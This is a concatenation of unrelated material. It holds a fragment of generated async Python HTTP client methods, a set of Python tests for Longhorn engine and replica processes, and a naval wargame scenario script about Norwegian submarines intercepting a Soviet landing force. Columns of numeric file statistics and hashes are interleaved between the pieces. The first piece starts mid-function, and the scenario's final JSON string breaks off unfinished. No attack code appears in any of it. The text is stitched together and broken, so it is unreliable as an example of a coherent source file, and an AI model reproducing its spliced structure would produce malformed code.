error_map = {401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop("error_map", {}))
content_type = kwargs.pop("content_type", "application/json") # type: Optional[str]
if boolean_value is not None:
json = self._serialize.body(boolean_value, "bool")
else:
json = None
request = build_patch204_request(
content_type=content_type,
json=json,
template_url=self.patch204.metadata["url"],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.Error, pipeline_response)
raise HttpResponseError(response=response, model=error)
if cls:
return cls(pipeline_response, None, {})
patch204.metadata = {"url": "/http/success/204"} # type: ignore
@distributed_trace_async
async def post204(self, boolean_value: Optional[bool] = True, **kwargs: Any) -> None:
"""Post true Boolean value in request returns 204 (no content).
:param boolean_value: Simple boolean value true.
:type boolean_value: bool
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop("cls", None) # type: ClsType[None]
error_map = {401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop("error_map", {}))
content_type = kwargs.pop("content_type", "application/json") # type: Optional[str]
if boolean_value is not None:
json = self._serialize.body(boolean_value, "bool")
else:
json = None
request = build_post204_request(
content_type=content_type,
json=json,
template_url=self.post204.metadata["url"],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.Error, pipeline_response)
raise HttpResponseError(response=response, model=error)
if cls:
return cls(pipeline_response, None, {})
post204.metadata = {"url": "/http/success/204"} # type: ignore
@distributed_trace_async
async def delete204(self, boolean_value: Optional[bool] = True, **kwargs: Any) -> None:
"""Delete true Boolean value in request returns 204 (no content).
:param boolean_value: Simple boolean value true.
:type boolean_value: bool
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop("cls", None) # type: ClsType[None]
error_map = {401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop("error_map", {}))
content_type = kwargs.pop("content_type", "application/json") # type: Optional[str]
if boolean_value is not None:
json = self._serialize.body(boolean_value, "bool")
else:
json = None
request = build_delete204_request(
content_type=content_type,
json=json,
template_url=self.delete204.metadata["url"],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.Error, pipeline_response)
raise HttpResponseError(response=response, model=error)
if cls:
return cls(pipeline_response, None, {})
delete204.metadata = {"url": "/http/success/204"} # type: ignore
@distributed_trace_async
async def head404(self, **kwargs: Any) -> None:
"""Return 404 status code.
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop("cls", None) # type: ClsType[None]
error_map = {401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop("error_map", {}))
request = build_head404_request(
template_url=self.head404.metadata["url"],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [204, 404]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.Error, pipeline_response)
raise HttpResponseError(response=response, model=error)
if cls:
return cls(pipeline_response, None, {})
head404.metadata = {"url": "/http/success/404"} # type: ignore
| 41.994069
| 106
| 0.662608
| 3,996
| 35,401
| 5.686436
| 0.051051
| 0.051226
| 0.030102
| 0.02174
| 0.88329
| 0.878977
| 0.878977
| 0.878581
| 0.878581
| 0.878581
| 0
| 0.023366
| 0.237168
| 35,401
| 842
| 107
| 42.043943
| 0.818071
| 0.0524
| 0
| 0.721022
| 0
| 0
| 0.042177
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.001965
| false
| 0
| 0.021611
| 0
| 0.068762
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e6d35dc2ef004be81b4ac49afc8fc1f957f0a704
| 8,774
|
py
|
Python
|
integration/instance/test_launcher_basic.py
|
MalibuKoKo/longhorn-engine
|
b31b3f177ebaadb222f733073ca6015ad01ae3ef
|
[
"Apache-2.0"
] | null | null | null |
integration/instance/test_launcher_basic.py
|
MalibuKoKo/longhorn-engine
|
b31b3f177ebaadb222f733073ca6015ad01ae3ef
|
[
"Apache-2.0"
] | null | null | null |
integration/instance/test_launcher_basic.py
|
MalibuKoKo/longhorn-engine
|
b31b3f177ebaadb222f733073ca6015ad01ae3ef
|
[
"Apache-2.0"
] | null | null | null |
import tempfile
from common import ( # NOQA
em_client, pm_client, # NOQA
create_replica_process, create_engine_process,
delete_engine_process, wait_for_process_running,
wait_for_process_deletion, wait_for_engine_deletion,
check_dev_existence, wait_for_dev_deletion,
SIZE, UPGRADE_LONGHORN_BINARY,
INSTANCE_MANAGER_TYPE_ENGINE, PROC_STATE_RUNNING,
PROC_STATE_STOPPING, PROC_STATE_STOPPED,
VOLUME_NAME_BASE, ENGINE_NAME_BASE, REPLICA_NAME_BASE,
)
def test_start_stop_replicas(pm_client): # NOQA
rs = pm_client.process_list()
assert len(rs) == 0
for i in range(10):
tmp_dir = tempfile.mkdtemp()
name = REPLICA_NAME_BASE + str(i)
r = create_replica_process(pm_client, name=name, dir=tmp_dir)
assert r.spec.name == name
assert r.status.state == PROC_STATE_RUNNING
r = pm_client.process_get(name=name)
assert r.spec.name == name
assert r.status.state == PROC_STATE_RUNNING
rs = pm_client.process_list()
assert len(rs) == (i+1)
assert name in rs
assert r.spec.name == name
assert r.status.state == PROC_STATE_RUNNING
for i in range(10):
rs = pm_client.process_list()
assert len(rs) == (10-i)
name = REPLICA_NAME_BASE + str(i)
r = pm_client.process_delete(name=name)
assert r.spec.name == name
assert r.status.state in (PROC_STATE_STOPPING,
PROC_STATE_STOPPED)
wait_for_process_deletion(pm_client, name)
rs = pm_client.process_list()
assert len(rs) == (9-i)
rs = pm_client.process_list()
assert len(rs) == 0
def test_one_volume(pm_client, em_client): # NOQA
rs = pm_client.process_list()
assert len(rs) == 0
replica_args = []
for i in range(3):
tmp_dir = tempfile.mkdtemp()
name = REPLICA_NAME_BASE + str(i)
r = create_replica_process(pm_client, name=name, dir=tmp_dir)
assert r.spec.name == name
assert r.status.state == PROC_STATE_RUNNING
r = pm_client.process_get(name=name)
assert r.spec.name == name
assert r.status.state == PROC_STATE_RUNNING
rs = pm_client.process_list()
assert len(rs) == (i+1)
assert name in rs
assert r.spec.name == name
assert r.status.state == PROC_STATE_RUNNING
replica_args.append("tcp://localhost:"+str(r.status.port_start))
engine_name = ENGINE_NAME_BASE + "0"
volume_name = VOLUME_NAME_BASE + "0"
e = create_engine_process(em_client, name=engine_name,
volume_name=volume_name,
replicas=replica_args)
assert e.spec.name == engine_name
check_dev_existence(volume_name)
es = em_client.engine_list()
assert len(es) == 1
assert engine_name in es
e = es[engine_name]
assert e.spec.name == engine_name
assert e.status.process_status.state == PROC_STATE_RUNNING
ps = pm_client.process_list()
assert len(ps) == 4
delete_engine_process(em_client, engine_name)
# test duplicate call
delete_engine_process(em_client, engine_name)
wait_for_engine_deletion(em_client, engine_name)
# test duplicate call
delete_engine_process(em_client, engine_name)
ps = pm_client.process_list()
assert len(ps) == 3
for i in range(3):
name = REPLICA_NAME_BASE + str(i)
r = pm_client.process_delete(name=name)
assert r.spec.name == name
assert r.status.state in (PROC_STATE_STOPPING,
PROC_STATE_STOPPED)
wait_for_process_deletion(pm_client, name)
ps = pm_client.process_list()
assert len(ps) == 0
def test_multiple_volumes(pm_client, em_client): # NOQA
rs = pm_client.process_list()
assert len(rs) == 0
cnt = 5
for i in range(cnt):
replica_args = []
tmp_dir = tempfile.mkdtemp()
replica_name = REPLICA_NAME_BASE + str(i)
r = create_replica_process(pm_client, name=replica_name, dir=tmp_dir)
assert r.spec.name == replica_name
assert r.status.state == PROC_STATE_RUNNING
r = pm_client.process_get(name=replica_name)
assert r.spec.name == replica_name
assert r.status.state == PROC_STATE_RUNNING
rs = pm_client.process_list()
assert len(rs) == (2*i+1)
assert replica_name in rs
r = rs[replica_name]
assert r.spec.name == replica_name
assert r.status.state == PROC_STATE_RUNNING
replica_args.append("tcp://localhost:"+str(r.status.port_start))
engine_name = ENGINE_NAME_BASE + str(i)
volume_name = VOLUME_NAME_BASE + str(i)
e = create_engine_process(em_client, name=engine_name,
volume_name=volume_name,
replicas=replica_args)
assert e.spec.name == engine_name
check_dev_existence(volume_name)
es = em_client.engine_list()
assert len(es) == (i+1)
assert engine_name in es
e = es[engine_name]
assert e.spec.name == engine_name
assert e.status.process_status.state == PROC_STATE_RUNNING
ps = pm_client.process_list()
assert len(ps) == 2*(i+1)
for i in range(cnt):
engine_name = ENGINE_NAME_BASE + str(i)
volume_name = VOLUME_NAME_BASE + str(i)
delete_engine_process(em_client, engine_name)
wait_for_engine_deletion(em_client, engine_name)
wait_for_dev_deletion(volume_name)
es = em_client.engine_list()
assert len(es) == (cnt-1-i)
assert engine_name not in es
def test_engine_upgrade(pm_client, em_client): # NOQA
rs = pm_client.process_list()
assert len(rs) == 0
dir_base = "/tmp/replica"
cnt = 3
for i in range(cnt):
replica_args = []
dir = dir_base + str(i)
replica_name = REPLICA_NAME_BASE + str(i)
r = create_replica_process(pm_client, name=replica_name, dir=dir)
assert r.spec.name == replica_name
assert r.status.state == PROC_STATE_RUNNING
r = pm_client.process_get(name=replica_name)
assert r.spec.name == replica_name
assert r.status.state == PROC_STATE_RUNNING
rs = pm_client.process_list()
assert len(rs) == (2*i+1)
assert replica_name in rs
r = rs[replica_name]
assert r.spec.name == replica_name
assert r.status.state == PROC_STATE_RUNNING
replica_args.append("tcp://localhost:"+str(r.status.port_start))
engine_name = ENGINE_NAME_BASE + str(i)
volume_name = VOLUME_NAME_BASE + str(i)
e = create_engine_process(em_client, name=engine_name,
volume_name=volume_name,
replicas=replica_args)
assert e.spec.name == engine_name
check_dev_existence(volume_name)
es = em_client.engine_list()
assert len(es) == (i+1)
assert engine_name in es
e = es[engine_name]
assert e.spec.name == engine_name
assert e.status.process_status.state == PROC_STATE_RUNNING
ps = pm_client.process_list()
assert len(ps) == 2*(i+1)
dir = dir_base + "0"
engine_name = ENGINE_NAME_BASE + "0"
replica_name = REPLICA_NAME_BASE + "0"
volume_name = VOLUME_NAME_BASE + "0"
replica_name_upgrade = REPLICA_NAME_BASE + "0-upgrade"
r = create_replica_process(pm_client, name=replica_name_upgrade,
binary=UPGRADE_LONGHORN_BINARY, dir=dir)
assert r.spec.name == replica_name_upgrade
assert r.status.state == PROC_STATE_RUNNING
replica_args = ["tcp://localhost:"+str(r.status.port_start)]
e = em_client.engine_upgrade(engine_name,
UPGRADE_LONGHORN_BINARY,
SIZE, replica_args)
assert e.spec.name == engine_name
check_dev_existence(volume_name)
r = pm_client.process_delete(name=replica_name)
assert r.spec.name == replica_name
assert r.status.state in (PROC_STATE_STOPPING,
PROC_STATE_STOPPED)
wait_for_process_deletion(pm_client, replica_name)
check_dev_existence(volume_name)
wait_for_process_running(em_client, engine_name,
INSTANCE_MANAGER_TYPE_ENGINE)
es = em_client.engine_list()
assert engine_name in es
e = es[engine_name]
assert e.spec.name == engine_name
assert e.status.process_status.state == PROC_STATE_RUNNING
delete_engine_process(em_client, engine_name)
wait_for_engine_deletion(em_client, engine_name)
wait_for_dev_deletion(volume_name)
| 32.376384
| 77
| 0.640985
| 1,203
| 8,774
| 4.349127
| 0.064007
| 0.078364
| 0.050459
| 0.064985
| 0.862576
| 0.844419
| 0.819381
| 0.800268
| 0.781346
| 0.734327
| 0
| 0.006236
| 0.268977
| 8,774
| 270
| 78
| 32.496296
| 0.809479
| 0.007864
| 0
| 0.784314
| 0
| 0
| 0.010465
| 0
| 0
| 0
| 0
| 0
| 0.357843
| 1
| 0.019608
| false
| 0
| 0.009804
| 0
| 0.029412
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e6e25260920fe9938a61b4a9f72fbabbffc61eef
| 40,741
|
py
|
Python
|
scenarios/SinglePlayer/ColdWar/Interception.py
|
dhanin/friendly-bassoon
|
fafcfd3921805baddc1889dc0ee2fa367ad882f8
|
[
"BSD-3-Clause"
] | 2
|
2021-11-17T10:59:38.000Z
|
2021-11-17T10:59:45.000Z
|
scenarios/SinglePlayer/ColdWar/Interception.py
|
dhanin/nws
|
87a3f24a7887d84b9884635064b48d456b4184e2
|
[
"BSD-3-Clause"
] | null | null | null |
scenarios/SinglePlayer/ColdWar/Interception.py
|
dhanin/nws
|
87a3f24a7887d84b9884635064b48d456b4184e2
|
[
"BSD-3-Clause"
] | null | null | null |
# Created on 11/07/14 03:28:30
from math import *
from random import *
from UnitCommands import *
def CreateScenario(SM):
SM.SetScenarioDescription("""Interception\n\nA scenario for Global Conflicts 2.\n\nInterception is a typical Cold War scenario putting Norwegian subs\nagainst an approaching Soviet landing force.\n\nYou are to sink the hostile LSTs before they take your Naval Base.\n\n\n\n\n\n""")
SM.SetScenarioName("""Interception""")
SM.CreateAlliance(1, 'Norway')
SM.SetAllianceDefaultCountry(1, 'Norway')
SM.SetAlliancePlayable(1, 1)
SM.CreateAlliance(2, 'USSR')
SM.SetAllianceDefaultCountry(2, 'USSR')
SM.SetAlliancePlayable(2, 0)
SM.CreateAlliance(3, 'Sweden')
SM.SetAllianceDefaultCountry(3, 'Sweden')
SM.SetAlliancePlayable(3, 0)
SM.SetAllianceRelationship(1, 3, 'Neutral')
SM.SetAllianceRelationship(2, 3, 'Neutral')
SM.SetUserAlliance(1)
SM.SetDateTime(1988,8,4,12,0,0)
SM.SetStartTheater(15.029165, 68.470833) # (lon, lat) in degrees, negative is West or South
SM.SetScenarioLoaded(1)
SM.SetSeaState(2)
SM.SetSVP('0.000000,1515.000000,200.000000,1500.000000,300.000000,1510.000000,500.000000,1520.000000,5000.000000,1600.000000')
####################
SM.SetSimpleBriefing(1, """TASKING ORDERS FOR CMDR NORWEGIAN OPERATIONS\n\nINTELLIGENCE\n\nThe Soviets try to capture our Naval Base at Harstad. A task force is \napproaching. You have only a few assets available to stop the hostile \nforces.\n\nMISSION\n\nSink the two LSTs.\n\nEXECUTION\n\nUse your air assets to gather information. Coordinate your subs. \n\nCOMMAND AND SIGNAL\n\nHNoMS Utsira\n\n\n""")
####################
SM.SetSimpleBriefing(2, """TASKING ORDERS:\n\n\nNO ADDITIONAL INTELLIGENCE AVAILABLE.\n""")
####################
SM.SetSimpleBriefing(3, """No briefing found""")
##############################
### Alliance 1 units
##############################
unit = SM.GetDefaultUnit()
unit.className = 'Airstrip'
unit.unitName = "Airfield Harstad"
unit.SetPosition(16.060294, 68.454419, -0.0)
unit.heading = 90.00
unit.speed = 0.0
unit.cost = 20000000.0
SM.AddUnitToAlliance(unit, 1)
UI = SM.GetUnitInterface(unit.unitName)
SM.AddToUnitMagazine("Airfield Harstad", 'Fuel', 1000228)
SM.AddToUnitMagazine("Airfield Harstad", 'Mk-46 Mod5', 46)
SM.AddToUnitMagazine("Airfield Harstad", 'DICASS (85) Sonobuoy', 120)
SM.AddToUnitMagazine("Airfield Harstad", 'LOFAR (85) Sonobuoy', 120)
SM.AddToUnitMagazine("Airfield Harstad", 'DIFAR (85) Sonobuoy', 360)
SM.AddToUnitMagazine("Airfield Harstad", 'AGM-65D', 16)
SM.AddToUnitMagazine("Airfield Harstad", 'Flare-1', 100)
SM.AddToUnitMagazine("Airfield Harstad", 'Chaff-1', 100)
UI.AddTask('RefuelAllAircraft', 3.000000, 3)
BB = UI.GetBlackboardInterface()
SM.AddUnitToFlightDeck('Airfield Harstad', 'P-3C II Orion', 'ASW Harstad-1', 2)
SM.SetFlightDeckUnitLoadout('Airfield Harstad', 'ASW Harstad-1', '17 DICASS (85) Sonobuoy;17 LOFAR (85) Sonobuoy;50 DIFAR (85) Sonobuoy;2 Mk-46 Mod5;2 AGM-65D;2 AGM-65D;2 Mk-46 Mod5;2 Mk-46 Mod5;8 Mk-46 Mod5;30 Chaff-1;30 Flare-1;')
SM.AddUnitToFlightDeck('Airfield Harstad', 'P-3C II Orion', 'ASW Harstad-2', 2)
SM.SetFlightDeckUnitLoadout('Airfield Harstad', 'ASW Harstad-2', '17 DICASS (85) Sonobuoy;17 LOFAR (85) Sonobuoy;50 DIFAR (85) Sonobuoy;2 Mk-46 Mod5;2 AGM-65D;2 AGM-65D;2 Mk-46 Mod5;2 Mk-46 Mod5;8 Mk-46 Mod5;30 Chaff-1;30 Flare-1;')
unit = SM.GetDefaultUnit()
unit.className = 'Communications Station'
unit.unitName = "Harstad Naval Base"
unit.SetPosition(16.060752, 68.441299, 1.0)
unit.heading = 90.00
unit.speed = 0.0
unit.cost = 0.0
SM.AddUnitToAlliance(unit, 1)
UI = SM.GetUnitInterface(unit.unitName)
UI.AddTask('PointDefense', 3.000000, 3)
BB = UI.GetBlackboardInterface()
unit = SM.GetDefaultUnit()
unit.className = 'Kobben'
unit.unitName = "HNoMS Skolpen"
unit.SetPosition(14.961361, 68.200082, -100.0)
unit.heading = 213.69
unit.speed = 3.9
unit.cost = 0.0
SM.AddUnitToAlliance(unit, 1)
SM.SetUnitLauncherItem(unit.unitName, 0, 'Type-612 Torpedo', 1)
SM.SetUnitLauncherItem(unit.unitName, 1, 'Type-612 Torpedo', 1)
SM.SetUnitLauncherItem(unit.unitName, 2, 'Type-612 Torpedo', 1)
SM.SetUnitLauncherItem(unit.unitName, 3, 'Type-612 Torpedo', 1)
SM.SetUnitLauncherItem(unit.unitName, 4, 'Type-612 Torpedo', 1)
SM.SetUnitLauncherItem(unit.unitName, 5, 'Type-612 Torpedo', 1)
SM.SetUnitLauncherItem(unit.unitName, 6, 'NT37C', 1)
SM.SetUnitLauncherItem(unit.unitName, 7, 'NT37C', 1)
UI = SM.GetUnitInterface(unit.unitName)
SM.AddToUnitMagazine("HNoMS Skolpen", 'Type-612 Torpedo', 6)
SM.AddToUnitMagazine("HNoMS Skolpen", 'NT37C', 6)
UI.SetSensorState(3, 0)
UI.AddTask('AvoidCav', 3.000000, 3)
UI.AddTask('SubBattery', 4.000000, 3)
UI.AddTask('SubEvade', 3.000000, 3)
BB = UI.GetBlackboardInterface()
unit = SM.GetDefaultUnit()
unit.className = 'Kobben'
unit.unitName = "HNoMS Utsira"
unit.SetPosition(15.284451, 68.167768, -100.0)
unit.heading = 250.62
unit.speed = 4.0
unit.cost = 0.0
SM.AddUnitToAlliance(unit, 1)
SM.SetUnitLauncherItem(unit.unitName, 0, 'Type-612 Torpedo', 1)
SM.SetUnitLauncherItem(unit.unitName, 1, 'Type-612 Torpedo', 1)
SM.SetUnitLauncherItem(unit.unitName, 2, 'Type-612 Torpedo', 1)
SM.SetUnitLauncherItem(unit.unitName, 3, 'Type-612 Torpedo', 1)
SM.SetUnitLauncherItem(unit.unitName, 4, 'Type-612 Torpedo', 1)
SM.SetUnitLauncherItem(unit.unitName, 5, 'Type-612 Torpedo', 1)
SM.SetUnitLauncherItem(unit.unitName, 6, 'NT37C', 1)
SM.SetUnitLauncherItem(unit.unitName, 7, 'NT37C', 1)
UI = SM.GetUnitInterface(unit.unitName)
SM.AddToUnitMagazine("HNoMS Utsira", 'Type-612 Torpedo', 6)
SM.AddToUnitMagazine("HNoMS Utsira", 'NT37C', 6)
UI.SetSensorState(3, 0)
UI.AddTask('AvoidCav', 3.000000, 3)
UI.AddTask('SubBattery', 4.000000, 3)
UI.AddTask('SubEvade', 3.000000, 3)
BB = UI.GetBlackboardInterface()
##############################
### Alliance 2 units
##############################
unit = SM.GetDefaultUnit()
unit.className = 'Pr 641B Som'
unit.unitName = "B-437 Magnitogorsk"
unit.SetPosition(14.829352, 68.030604, -200.0)
unit.heading = 28.76
unit.speed = 3.9
unit.cost = 0.0
SM.AddUnitToAlliance(unit, 2)
SM.SetUnitLauncherItem(unit.unitName, 0, 'SET-65M', 1)
SM.SetUnitLauncherItem(unit.unitName, 1, 'SET-65M', 1)
SM.SetUnitLauncherItem(unit.unitName, 2, 'SET-65M', 1)
SM.SetUnitLauncherItem(unit.unitName, 3, 'SET-65M', 1)
SM.SetUnitLauncherItem(unit.unitName, 4, '53-65M', 1)
SM.SetUnitLauncherItem(unit.unitName, 5, '53-65M', 1)
UI = SM.GetUnitInterface(unit.unitName)
SM.AddToUnitMagazine("B-437 Magnitogorsk", 'SET-65M', 12)
SM.AddToUnitMagazine("B-437 Magnitogorsk", '53-65M', 6)
UI.SetSensorState(0, 0)
UI.SetSensorState(4, 0)
UI.AddTask('AvoidCav', 3.000000, 3)
UI.AddTask('EngageAll', 2.000000, 0)
UI.AddTask('Nav', 1.000000, 0)
UI.AddNavWaypointAdvanced(0.262058, 1.190724, 0.000000, 0.000000)
UI.AddNavWaypointAdvanced(0.265758, 1.189080, 0.000000, 0.000000)
UI.SetNavLoopState(1)
UI.AddTask('SubBattery', 4.000000, 3)
UI.AddTask('SubEvade', 3.000000, 3)
BB = UI.GetBlackboardInterface()
BB.Write('129_EngageLimit', '1')
BB.Write('16_EngageLimit', '4')
BB.Write('17_EngageLimit', '6')
BB.Write('18_EngageLimit', '12')
BB.Write('22_EngageLimit', '24')
BB.Write('256_EngageLimit', '2')
BB.Write('257_EngageLimit', '24')
BB.Write('258_EngageLimit', '2')
BB.Write('32_EngageLimit', '1')
BB.Write('33_EngageLimit', '1')
BB.Write('34_EngageLimit', '1')
BB.Write('64_EngageLimit', '1')
BB.Write('ID_EngageLimit', '{"12": "0"}')
BB.Write('MissionTarget', '["Target", 12]')
BB.Write('Selected', '{"RotaryWing": 0, "Speed-": 10, "Alt+": 0, "Speed+": 10, "RadarMast+": 0, "RadarMast-": 1, "34_EngageLimit": "1", "257_EngageLimit": "24", "17_EngageLimit": "6", "UnitCount": 7, "HasECM": 0, "HasTarget": 0, "TargetDatum": 0, "Alliance0_EngageLimit": -1, "FixedLand": 0, "Launchers": 1, "Periscope-": 1, "FixedWing": 0, "MagWeaponList": {"9M32M Strela 3": 8, "30mm OF-84 HE-FRAG AK-630M": 12272, "TEST-68": 0, "TEST-71ME": 0, "RPK-6 Vodopod": 0, "SAET-60M": 0, "130mm F-44 HE": 500, "SET-65M": 144, "100mm OF-58 FRAG": 1400, "9M330 Kinzhal": 0, "TEST-71MKE": 0, "3M45 Granit": 0, "30mm OP-84 FRAG Tracer AK-630M": 0, "Yu-6": 0, "130mm ZS-44 AA": 0, "9M32 Strela 2": 48, "RPK-3 Metel": 0, "SET-65": 0, "TEST-71": 0, "53-56V": 0, "5V55RM": 0, "3M10 Granat(n)": 0, "3M10 Granat": 0, "AT-2M": 0, "76.2mm OS-62 FRAG": 0, "9M33M": 0, "53-56": 0, "100mm ZS-58 AA": 0, "130mm ZS-44P AA": 0, "3M54E Klub Alfa": 0, "76.2mm ZS-63 AA": 0, "100mm ZS-58P AA": 0, "53-65KE": 0, "3M80M Moskit-M": 0, "USET-80": 0, "Shkval": 0, "53-65M": 196}, "Air": 0, "64_EngageLimit": "1", "HasAIWeap": 0, "18_EngageLimit": "12", "256_EngageLimit": "2", "Depth+": 250.0, "MobileLand": 0, "CanStrafe": 0, "Depth-": 0, "HasSonarP": 1, "HasThrottle": 0, "PeriDeep": 0, "Sub": 2, "HasSonarA": 1, "HasFlightPort": 1, "HasMagazine": 1, "DieselSub": 1, "HasGBU": 0, "HasAINav": 0, "FormMember": 4, "Alliance1_EngageLimit": -1, "HasBombs": 0, "Snorkel-": 1, "TargetTrack": 1, "Snorkel+": 0, "16_EngageLimit": "4", "Alliance2_EngageLimit": -1, "258_EngageLimit": "2", "FormLeader": 1, "129_EngageLimit": "1", "HasESM": 1, "Periscope+": 0, "22_EngageLimit": "24", "FormModeSprint": 4, "32_EngageLimit": "1", "Tasks": {"MissileWarning": 2, "Nav": 3, "EngageAll": 5}, "HasOptical": 1, "33_EngageLimit": "1", "HasRadar": 1, "Ship": 5, "TargetSet": 1, "FormModePace": 0, "WeaponList": {"9M330 Kinzhal": [64, 64], "9M32M Strela 3": [1, 1], "5V55RM": [64, 64], "3M45 Granit": [16, 16], "9M32 Strela 2": [24, 24], "SET-65M": [8, 8], "130mm F-44 HE": [100, 100], "30mm OF-84 HE-FRAG AK-630M": [590, 590], "76.2mm OS-62 FRAG": [608, 608], "9M33M": [80, 80], "100mm OF-58 FRAG": [92, 92], "53-65M": [26, 26], "RPK-3 Metel": [12, 12]}}')
unit = SM.GetDefaultUnit()
unit.className = 'Pr 877M Paltus'
unit.unitName = "B-439"
unit.SetPosition(14.446730, 68.047276, -150.0)
unit.heading = 74.08
unit.speed = 5.9
unit.cost = 0.0
SM.AddUnitToAlliance(unit, 2)
SM.SetUnitLauncherItem(unit.unitName, 0, '9M32M Strela 3', 1)
SM.SetUnitLauncherItem(unit.unitName, 1, 'SET-65M', 1)
SM.SetUnitLauncherItem(unit.unitName, 2, 'SET-65M', 1)
SM.SetUnitLauncherItem(unit.unitName, 3, 'SET-65M', 1)
SM.SetUnitLauncherItem(unit.unitName, 4, 'SET-65M', 1)
SM.SetUnitLauncherItem(unit.unitName, 5, '53-65M', 1)
SM.SetUnitLauncherItem(unit.unitName, 6, '53-65M', 1)
UI = SM.GetUnitInterface(unit.unitName)
SM.AddToUnitMagazine("B-439", 'SET-65M', 12)
SM.AddToUnitMagazine("B-439", '53-65M', 6)
SM.AddToUnitMagazine("B-439", '9M32M Strela 3', 8)
UI.SetSensorState(0, 0)
UI.SetSensorState(4, 0)
UI.AddTask('AvoidCav', 3.000000, 3)
UI.AddTask('EngageAll', 2.000000, 0)
UI.AddTask('Nav', 1.000000, 0)
UI.AddNavWaypointAdvanced(0.257382, 1.188411, 0.000000, 0.000000)
UI.AddNavWaypointAdvanced(0.265398, 1.190210, 0.000000, 0.000000)
UI.AddNavWaypointAdvanced(0.271771, 1.191623, 0.000000, 0.000000)
UI.AddNavWaypointAdvanced(0.278605, 1.193216, 0.000000, 0.000000)
UI.SetNavLoopState(1)
UI.AddTask('SubBattery', 4.000000, 3)
UI.AddTask('SubEvade', 3.000000, 3)
BB = UI.GetBlackboardInterface()
BB.Write('129_EngageLimit', '1')
BB.Write('16_EngageLimit', '4')
BB.Write('17_EngageLimit', '6')
BB.Write('18_EngageLimit', '12')
BB.Write('22_EngageLimit', '24')
BB.Write('256_EngageLimit', '2')
BB.Write('257_EngageLimit', '24')
BB.Write('258_EngageLimit', '2')
BB.Write('32_EngageLimit', '1')
BB.Write('33_EngageLimit', '1')
BB.Write('34_EngageLimit', '1')
BB.Write('64_EngageLimit', '1')
BB.Write('ID_EngageLimit', '{"12": "0"}')
BB.Write('MissionTarget', '["Target", 12]')
BB.Write('Selected', '{"RotaryWing": 0, "Speed-": 10, "Alt+": 0, "Speed+": 10, "RadarMast+": 0, "RadarMast-": 1, "34_EngageLimit": "1", "257_EngageLimit": "24", "17_EngageLimit": "6", "UnitCount": 7, "HasECM": 0, "HasTarget": 0, "TargetDatum": 0, "Alliance0_EngageLimit": -1, "FixedLand": 0, "Launchers": 1, "Periscope-": 1, "FixedWing": 0, "MagWeaponList": {"9M32M Strela 3": 8, "30mm OF-84 HE-FRAG AK-630M": 12272, "TEST-68": 0, "TEST-71ME": 0, "RPK-6 Vodopod": 0, "SAET-60M": 0, "130mm F-44 HE": 500, "SET-65M": 144, "100mm OF-58 FRAG": 1400, "9M330 Kinzhal": 0, "TEST-71MKE": 0, "3M45 Granit": 0, "30mm OP-84 FRAG Tracer AK-630M": 0, "Yu-6": 0, "130mm ZS-44 AA": 0, "9M32 Strela 2": 48, "RPK-3 Metel": 0, "SET-65": 0, "TEST-71": 0, "53-56V": 0, "5V55RM": 0, "3M10 Granat(n)": 0, "3M10 Granat": 0, "AT-2M": 0, "76.2mm OS-62 FRAG": 0, "9M33M": 0, "53-56": 0, "100mm ZS-58 AA": 0, "130mm ZS-44P AA": 0, "3M54E Klub Alfa": 0, "76.2mm ZS-63 AA": 0, "100mm ZS-58P AA": 0, "53-65KE": 0, "3M80M Moskit-M": 0, "USET-80": 0, "Shkval": 0, "53-65M": 196}, "Air": 0, "64_EngageLimit": "1", "HasAIWeap": 0, "18_EngageLimit": "12", "256_EngageLimit": "2", "Depth+": 250.0, "MobileLand": 0, "CanStrafe": 0, "Depth-": 0, "HasSonarP": 1, "HasThrottle": 0, "PeriDeep": 0, "Sub": 2, "HasSonarA": 1, "HasFlightPort": 1, "HasMagazine": 1, "DieselSub": 1, "HasGBU": 0, "HasAINav": 0, "FormMember": 4, "Alliance1_EngageLimit": -1, "HasBombs": 0, "Snorkel-": 1, "TargetTrack": 1, 